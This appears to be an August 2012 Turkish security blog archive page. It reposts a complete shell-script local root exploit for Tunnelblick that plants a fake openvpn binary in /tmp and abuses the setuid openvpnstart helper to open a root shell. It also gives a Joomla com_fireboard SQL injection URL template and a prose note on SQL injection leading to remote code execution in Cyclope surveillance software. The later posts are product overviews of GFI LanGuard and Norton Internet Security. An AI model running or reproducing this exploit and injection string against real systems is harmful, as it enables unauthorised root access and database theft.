Archive for 12 Ağustos 2012

admin | 12 Ağustos 2012
No comments

Tunnelblick Local Root Exploit

Tunnelblick Openvpn local root açığı iki kez exploit edilmiştir. ikinci c exploit linki aşağıdadır.
Local rootun tehlikelerinden bahsetmeme gerek yok görüldüğü üzere full erişim. Açık kısa zamanda kapatılacaktır.

#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn
echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0
Category: Genel | Tags: , , ,
admin | 10 Ağustos 2012
No comments

Joomla com_fireboard – SQL Injection Vulnerability

Joomla com_fireboard - SQL Injection Vulnerability Açığı Yayınlandı.

http://[TARGET]/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf'[SQL-INJECTION]

Bulunan bu açık sayesinde sql databasede bulunam verilere erişim imkanı bulummaktadır.

Açığın bir an önce kapatılması gerekir.

Category: Genel | Tags: , ,
admin | 10 Ağustos 2012
No comments

Cyclope Employee Surveillance Solution v6.0 SQL Injection

Cyclope Employee Surveillance Solution v6.0 SQL Injection Açığı Yayınlandı, Açık sayesinde sql injection açığından faydalınarak resimde görüldüğü gibi back connect sağlabilmekte, uzaktan kod çalıştırılabilmektedir.

________________________________

Author: loneferret of Offensive Security Product: Cyclope Employee Surveillance Solution v6.0 Version: 6.0 Vendor

description: The employee monitoring software developed by Cyclope-Series is specially designed to inform and equip management with statistics relating to the productivity of staff within their organization. Vulnerability: Due to improper input sensitization, many parameters are prone to SQL injection. Most importantly, the username parameter in the application’s login form.

code

Category: Genel | Tags: ,
admin | 08 Ağustos 2012
No comments

GFI LanGuard Programı Ne işe yarar

GFI LanGuard Ağ Güvenliği ile ilgili geniş kapsamlı yazılımdır.
network security for businesses Işletmeler için kapsamlı ağ güvenliği sunar.

 sanal güvenlik danışmanı gibi çalışır.

  • Patch management -Yama yönetimi
  • Vulnerability assessment -Güvenlik açığı değerlendirmesi
  • Network auditing -Ağ denetim

Bu temel güvenlik araçlarına toplam sahip olma maliyetini azaltarak, ücünü birden sunan tek şirkettir.  Ayrıca varlık envanter, değişim yönetimi, risk analizi ve kanıtlama gibi konuları analiz ederek sizlere yardımcı olur.

GFI LANguard tüm dünyada küçük ve orta ölçekli işletmeler (KOBİ’ler) tarafından güvenliklerini ölçmeleri için iyi bör çözüm olabilir.

Kurulumu ve kullanımı kolaydır, GFI LANguard size ağ kurulumunun tam bir resmini verir ve güvenli uyumlu ağ durumunu korumak için yardımcı olur.

Bu daha hızlı ve daha etkili bir otomatik yama yönetimi özellikleri aracılığıyla ve minimal idari çaba ile yapar.

Orta ölçekli küçük işletmeler için yama yönetimi yazılımı ve dağıtımı

Güvenlik yamaları yazılım paketleri güvenlik açığı (ve diğer sorunları) çözmek için geliştirilen yazılımın ek parçaları, kusurları gidermek ve genellikle ek işlevsellik sağlıyor. Yaması geçilmemiş, burada yer alan hassas verilere erişmek için kötü niyetli kişiler bu durumdan istifade edebilir. Truva atları, virüs ve hacker saldırılarına önemli bir artış olmuştur. Yerinde etkin bir yama yönetimi yazılımı ve yama yönetimi politikası sahip her büyüklükteki ağlar için ilk savunma hattıdır.

Yama yönetimi, her BT yöneticisinin sorumluluğunun önemli bir parçasıdır. Bir ağı güvenli yapmak ve  korumak için, tek bir yeni güvenlik yamaları ve işletim sistemi hizmet paketleri ağ çapında yüklü olduğundan emin olmalısınız. Yama yönetimi yazılımı aynı zamanda işletmelerin bilgi varlıklarının kontrolü sürdürmek için gerekli Sarbanes-Oxley Yasası ve HIPAA gibi en son uyum yönetmeliklerine uygun bir rol oynar.

Etkili bir yama yönetimi süreci ağ üzerinde birden fazla bilgisayara yazılım açıkları keşfi değil, aynı zamanda sonraki yama kurulumu sadece içerir. BT yöneticileri yaması geçilmemiş bilgisayarların bir ağda sahip olabileceği etkilerini anlamak. Onlar da tamamen ağ çapında koruma sağlanması zorluğunu biliyoruz, çünkü bir yama yönetimi yazılımı çözümü hızlı BT yöneticileri kolay yönetmek için tercih edilen bir araç haline gelmiştir.

Otomatik yama dağıtım gelişigüzel bir süreç olmamalı ama bir yama dağıtım döngüsüne dayalı önceden belirlenmiş bir politika takip etmelidir. Algılama – güvenlik yamaları eksikliğini  taramak için yama yönetimi yazılımı kullanın. Algılama otomatik edilmeli ve yama yönetimi sürecinin tetiklemesi gerekir. Acquire – açığı zaten yerinde güvenlik önlemleri  değilse, test için yama indirmek gerekir. Test – güvenlik düzeltmeleri uygundur ve sistem ödün vermeden sağlamak için gerçekçi bir çalışma ortamında yamalanır. Ağdaki diğer bilgisayarlara dağıtarak yama dağıtım izin verin. Sistem kullanıcıları en az etki ile başarısını sağlamak için bu dağıtımı inceleyin. Yeni bir güvenlik yaması mevcuttur sonra, süreç yeniden başlar.

Otomatik yama kurulumu en iyi teknik uygulamaları desteklemek için yardımcı olur;  Otomatik bir yama yönetimi sistemi açıkları ile uğraşan ve saldırılara karşı sistemi korumak için harcanan zaman ve ekonomik yarar sağlar. İyi bir sistem birden fazla makineyi izlemek ve gerekli güvenlik yamaları yüklemekle olacaktır. Yamalar yönetmek için bir çözüm olması iş işletim sistemi ve uygulama yazılımları içinde bulunan tehditlere karşı sürekli olarak güvenli olmasını sağlar.

İyi bir yama yönetimi politikası ile yamalar uygulanmalıdır hangi sistemlerde zaman aralıklarında. Stratejik bir planı gerektirir Aynı zamanda yakalamak ve her gün ortaya yeni güvenlik açıkları ve tehditlere karşı savunmak için aralıklarla tekrar edilmesi gerekir.

 

 

Category: Genel | Tags: , , ,
admin | 08 Ağustos 2012
No comments

Norton İnternet Security Pc nizi Nasıl Koruyor

Norton İnternet Security:

Dünyanın en fazla kullanıcısına sahip olan ve köklü geçmişi Olan Norton Kişisel pc leri korumada her zaman olduğu gibi gene bir numara olmaya devam ediyor. Pc yi Kasmasından şikayet edilen Norton kaynak kullanımını minimize etsede diğer antivirüslere oranla daha fazla kastığı bir gerçek. Ama bir başka gerçekte şu, Virüslere, trojanlara, Malvarelere, istenmeyen yazılımlara geçit vermeyen en etkili antivirüs yazılımı ise gene Norton. Bilemiyorum ben yıllardır vazgeçemedim. İşte Yaptıkları

 

Çevrimiçi tehlikeleri performanstan ödün vermeden durdurur

Siber suçlulardan korkmadan e-posta gönderip almanizi, sohbet etmenizi ve Web’de gezmenizi saglar.

Virüsleri, casus yazilimlari ve diger tehditleri, zarar vermelerine firsat vermeden durdurur

Süpheli baglantilar, ekler ve diger dolandirici ögelere karsi e-postalari ve anlik iletileri tarar

Yasa disi yazilimlarin bilgisayariniza gizlice yüklenmesini önler

Rahatsiz edici ve tehlikeli olabilecek spam’leri engeller

Kimlik Korumasi

Güvenle çevrimiçi gezmenizi, alisveris ve banka islemleri yapmanizi saglar

Arama sonuçlarinizdaki güvenli olmayan web siteleri konusunda sizi uyarir ve bu web sitelerini otomatik olarak engeller

Kimliginizi çalmaya çalisan kimlik avi web sitelerini engeller

Siber suçlularin bilgisayariniza gizlice girip kisisel bilgilerinizi çalmalarini önler

Ebeveyn Denetimleri Yönetimi

Çocuklarinizin ziyaret ettigi web sitelerini izler ve uygun olmayan sitelere erisimi engeller

Çocuklarinizin sosyal ag etkinliklerini ve çevrimiçi ortamda kimlerle sohbet ettiklerini takip eder

Güven ve Kullanim Kolayligi

Ihtiyaciniz oldugunda e-posta, sohbet ve telefon yoluyla ücretsiz teknik destek vererek yardim sunar

Ciddi sekilde virüs bulasmis bilgisayarlari bile Norton Yardim Araçlari ile düzeltir

Yedekleme ve Geri Yükleme

Fotograflarinizi, müziklerinizi ve dosyalarinizi harici bir cihaza ya da güvenli çevrimiçi depolama alanimiza otomatik olarak yedekleyerek korur

Yüzlerce fotograf ve sarkiyi depolayabileceginiz 2 GB’lik güvenli çevrimiçi yedekleme alani dahildir

PC Ayarlama

Bilgisayarinizi yavaslatabilecek sorunlari otomatik olarak bulur ve düzeltir

Açilista hangi programlarin yüklenecegini seçmenize izin vererek bilgisayarinizin daha hizli baslayip çalismasini saglar

Çökmeleri önlemeye yardimci olur ve güncel olmayan sistem dosyalarini kaldirarak bilgisayarinizin sorunsuz çalismasini saglar

Avantajlar

  • Virüsleri, casus yazılımı ve çevrimiçi kimlik hırsızlığını durdurun
    • Çevrimiçi tehditlere karşı gelişmiş koruma sunar.
    • Dört farklı akıllı koruma katmanı, tehditleri bilgisayarınıza ulaşmadan önce proaktif biçimde algılar ve ortadan kaldırır.
    • Yeni tehditleri hızlı bir şekilde belirler ve durdurur.
  • Çevrimiçi ortamda gezinti veya alışveriş yaparken, bankacılık işlemlerinizi gerçekleştirirken ve sosyal etkinlikleriniz sırasında içiniz rahat olsun
    • E-postaları ve anlık iletileri virüslere, şüpheli bağlantılara, virüs bulaşmış eklere ve diğer tehlikelere karşı siz onları açmadan önce tarar.
    • Güvenli web sitelerini tespit eder, güvenli olmayan siteleri proaktif biçimde bloke eder ve çevrimiçi tehditleri tarayıcınız daha onları yüklemeden durdurur.*
    • Siber suçluların bilgisayarınıza sızmasını ve kablosuz ağlar kullandığınızda bilgilerinizi gizlice ele geçirmesini engeller.
  • En sevdiğiniz çevrimiçi etkinliklerin keyfini güvenle, sinir bozucu yavaşlama veya kesintiler olmadan çıkarın
    • Yüksek tarama hızlarıyla üstün performans sunar.
    • Arka planda çalıştığından çalışmanızı veya oyununuzu kesintiye uğratmaz.
    • Bilgisayarınızın belleğini ve sabit disk alanını tüketmez.
  • Çevrimiçi olduklarında çocuklarınızı Ödüllü Norton Online Family ile koruyun
    • Ebeveyn denetimleri yönetimi sayesinde Norton Online Family’ye doğrudan Norton Denetim Merkezi’nden kolayca erişebilir, bu konumdan kurabilir ve çalıştırabilirsiniz.
    • Çocuklarınızın ziyaret ettiği web sitelerini izleyerek çevrimiçi olarak neler yaptıklarını öğrenebilir ve uygun olmayan siteleri bloke edebilirsiniz.
    • Çocuğunuzun sosyal ağ etkinliklerini ve kimlerle çevrimiçi sohbet ettiklerini takip ederek olası tehlikeleri belirleyebilirsiniz.
  • Hızlı kurulum ve kullanımı kolay özellikler sayesinde kısa sürede kullanıma hazır olur
    • Tek tıklatmayla çok hızlı bir şekilde yüklenir.
    • Dosyaların ve uygulamaların güvenli olduğunu veya bilgisayarınızı yavaşlatabileceğini ya da bilgisayarınızın çökmesine neden olabileceğini size proaktif şekilde belirtir.
    • Geliştirilmiş özelleştirilebilir Denetim Merkezi, program kontrollerine ve Web tabanlı Norton hizmetlerine erişmek için basit veya ayrıntılı bir görüntü arasında seçim yapmanıza artık olanak tanıyor.

Özellikler

  • Norton Koruma Sistemi – çevrimiçi tehditleri bilgisayarınıza bulaşmadan proaktif olarak durdurmak için dört adet benzersiz, güçlü koruma katmanı sunar.
  • Insight – yeni çevrimiçi tehditleri size sorun çıkarmadan önce durdurmak için dosyaların kökenini ve tarihçesini kontrol eder.
  • İndirme Sicili 2.0 – uygulamayı yüklemeden önce bunun bilgisayarınızın sağlığına ve güvenilirliğine zarar verip vermeyeceğini bildirerek sizi tehlikeli uygulamalardan korur.
  • Norton Safe Web – Web’de dolaşırken sizi, arama sonuçlarınızda çıkan güvenli olmayan, sahte web siteleri konusunda uyararak ve bunları bloke ederek korur.*
  • Norton Yönetimi – bulut tabanlıdır; bu sayede Norton ürünlerini İnternet’i kullanarak her yerden indirebilir, yükleyebilir, aktarabilir, güncelleyebilir veya yenileyebilirsiniz.
  • Ebeveyn denetimleri yönetimi – ödüllü Norton Online Family ile çocuklarınızın çevrimiçi etkinliklerini izlemenize olanak tanıyarak onları çevrimiçi tehlikelerden korumanıza yardımcı olur.
  • Ağ tehdidi koruması – tehditleri bir ağ üzerinde gezinirken algılar ve bilgisayarınıza erişmeden ortadan kaldırır.
  • Tarayıcı koruması – çevrimiçi tehditleri herhangi bir zarar vermelerine fırsat tanımaksızın, tarayıcınız daha yüklenirken kontrol ve bloke ederek sizi korur.
  • SONAR 4 Davranışsal Koruma – yeni tehditleri çabuk ve doğru şekilde tespit etmek ve durdurmak üzere bilgisayarınızda şüpheli davranışlar olup olmadığını izler.
  • Facebook için Norton Safe Web – tehlikeli indirmeler ve güvenli olmayan web sitelerine bağlantılara karşı Haber Kaynağınızı tarar ve sizi ve Facebook arkadaşlarınızı bunlar hakkında uyarır.
  • ·         Ürün Desteği – gerektiğinde uzman yardımı ve yanıtlar sunar.**
  • ·         Güvenlik Açığı Koruması – siber suçluların bilgisayarınıza tehdit sızdırmak için uygulamalardaki güvenlik boşluklarını (zayıf noktalar) kullanmalarını engeller.
  • ·         Güç tasarrufu ayarları – bilgisayarınız fişe takılana kadar kritik olmayan işlemleri askıya alarak dizüstü bilgisayarınızın pil ömrünü en üst düzeye çıkarır.
  • Norton Identity Safe – siber suçluların bilgilerinizi çalmasını önlemek için web sitesi kullanıcı adlarınızı ve şifrelerinizi hatırlar, emniyete alır ve otomatik olarak girer. Artık içerdiği çevrimiçi sürümüyle oturum açma bilgilerinizi Norton Internet Security 2012 ile korunan başka bilgisayarlar arasında paylaşabilirsiniz.
  • Kimlik avını önleme teknolojisi – Siber suçluların kimliğinizi ve paranızı çalmak için kullandığı dolandırıcılık amaçlı web sitelerini bloke eder.
  • Bant genişliği yönetimi – 3G ağlara bağlandığınızda önemli olmayan Norton güncellemelerini sınırlandırır; böylece aylık veri kotanızı tüketmenizi veya kota aşımı ücretlerinin uygulanmasını önler.
  • Norton Aralıklı Güncellemeler – en yeni tehditlere karşı en güncel korumayı sunmak için korumanızı her 5 ila 15 dakikada bir, sizi kesintiye uğratmadan günceller.
  • E-posta ve anlık ileti izleme – siber suçluların kişisel bilgilerinizi çalmak amacıyla kullandığı şüpheli bağlantılar, ekler ve diğer hileler için e-posta ve anlık iletileri tarar.
  • İki yönlü akıllı güvenlik duvarı – sürekli güvenlikle ilgili kararlar vermenizi istemeden, siber suçluların bilgisayarınıza saldırmasına ve kişisel bilgilerinizi çalmasına engel olur.
  • Profesyonel düzeyde spam engelleme – posta kutunuzda istenmeyen, tehlikeli ve dolandırıcı e-postaların bulunmamasını sağlar.
  • Ağ eşleştirme ve izleme – ev ağınıza bağlı aygıtların tümünü gösterir, böylece kablosuz bağlantınızı kullanan ve/veya sohbetlerinize kulak kabartan davetsiz misafirleri tespit edebilirsiniz.
  • Norton Bootable Recovery Tool – bilgisayarınıza çalışamayacağı kadar çok virüs bulaşmış olduğunda bile bilgisayarınızın bir an önce yeniden çalışmaya başlamasını sağlayan acil durum CD/DVD/USB’si oluşturur.
  • Etkileşimsiz mod – siz bilgisayarınızda tam ekran modunda film seyrederken veya oyun oynarken uyarıları ve kritik olmayan güncellemeleri beklemeye alır.
  • Norton Denetim Merkezi – seçtiğiniz standart ayrıntılı görünümden veya yeni bir basitleştirilmiş görünümden program ayarlarına ve Web tabanlı Norton hizmetlerine kolayca erişmenizi sağlar.
  • Akıllı zamanlayıcı – tarama ve güncelleştirmeleri yalnızca bilgisayarınızı kullanmadığınız sırada yapar.
  • Aylık rapor – geçen ay sizi tehditlerden korumak için Norton Internet Security tarafından neler yapıldığını açıklar.

Desteklenen İşletim Sistemleri

  • Service Pack 2 veya üstü ile Microsoft® Windows® XP (32 bit) Home/Professional/Tablet PC/Media Center (32 bit)
  • Service Pack 1 veya üstü ile Microsoft Windows Vista® (32 bit ve 64 bit) Starter/Home Basic/Home Premium/Business/Ultimate
  • Microsoft Windows 7 (32 bit ve 64 bit) Starter/Home Basic/Home Premium/Ultimate

Minimum Donanım Gereksinimleri

  • Microsoft Windows XP için 300 MHz, Microsoft Windows Vista/Microsoft Windows 7 için 1 GHz
  • 256 MB RAM
  • 300 MB kullanılabilir sabit disk alanı
  • CD-ROM veya DVD sürücü (elektronik indirme yoluyla yüklenmiyorsa)

Tarayıcı Eklenti Desteği

  • Microsoft Internet Explorer® 6.0 veya üstü (yalnızca 32 bit)
  • Mozilla® Firefox® 9.0 ve üstü (yalnızca 32 bit)

Antispam desteği

  • Microsoft Outlook® 2002 veya daha yeni bir sürümü
  • Microsoft Outlook Express 6.0 veya daha yeni bir sürümü
  • Windows Mail (yalnızca spam filtreleme)

Güvenlik Açığı Koruması ve Kimlik Avı Koruması için Tarayıcı Desteği

  • Microsoft Internet Explorer® 6.0 veya üstü (yalnızca 32 bit)
  • Mozilla® Firefox® 9.0 ve üstü (yalnızca 32 bit)
  • Google Chrome™ 10.0 veya daha yeni bir sürümü

POP3 uyumlu e-posta istemcileri için e-posta taraması desteklenir

Category: Genel | Tags: , , , , ,
« Older Entries   Recent Entries »